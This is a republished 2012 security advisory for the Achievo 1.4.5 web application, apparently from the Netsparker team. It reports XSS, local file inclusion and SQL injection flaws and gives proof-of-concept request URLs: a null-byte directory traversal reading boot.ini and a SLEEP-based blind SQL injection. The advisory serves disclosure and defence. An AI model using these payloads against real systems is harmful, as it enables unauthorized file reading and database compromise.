Achievo 1.4.5 – Multiple Vulnerabilities (1)

• Exploit Database
• 17 阅读

• 作者： Canberk BOLAT
  日期： 2012-11-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/22431/

• Information
  --------------------
  Name :XSS, LFI and SQL Injection Vulnerabilities in Achievo
  Software :Achievo 1.4.5 and possibly below.
  Vendor Homepage :http://www.achievo.org
  Vulnerability Type :Cross-Site Scripting, Local File Inclusion and SQL
  Injection
  Severity :Critical
  Researcher :Canberk Bolat
  Advisory Reference :NS-12-016
  
  Description
  --------------------
  Achievo is a flexible web-based resource management tool for business
  environments. Achievo's resource management capabilities will enable
  organisations to support their business processes in a simple, but
  effective manner.
  
  Details
  --------------------
  Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
  version 1.4.5.
  XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
  atkselector, atkfilter, searchString)
  LFI:
  http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
  SQL Injection:
  http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
  You can read the full article about Cross-Site Scripting, LFI and SQL
  Injection vulnerabilities from here:
  
  Cross-site Scripting (XSS):
  http://www.mavitunasecurity.com/crosssite-scripting-xss/
  Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
  Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/
  
  Solution
  --------------------
  -
  
  Advisory Timeline
  --------------------
  23/01/2011 - First contact
  25/02/2012 - Second contact - No response
  01/11/2012 - Advisory released
  
  Credits
  --------------------
  It has been discovered on testing of Netsparker, Web Application Security
  Scanner - http://www.mavitunasecurity.com/netsparker/.
  
  References
  --------------------
  Vendor Url / Patch : -
  MSL Advisory Link :
  http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
  Netsparker Advisories :
  http://www.mavitunasecurity.com/netsparker-advisories/
  
  About Netsparker
  --------------------
  Netsparker® can find and report security issues such as SQL Injection and
  Cross-site Scripting (XSS) in all web applications regardless of the
  platform and the technology they are built on. Netsparker's unique
  detection and exploitation techniques allows it to be dead accurate in
  reporting hence it's the first and the only False Positive Free web
  application security scanner.
  
  -- 
  Netsparker Advisories, <advisories@mavitunasecurity.com>
  Homepage, http://www.mavitunasecurity.com/netsparker-advisories/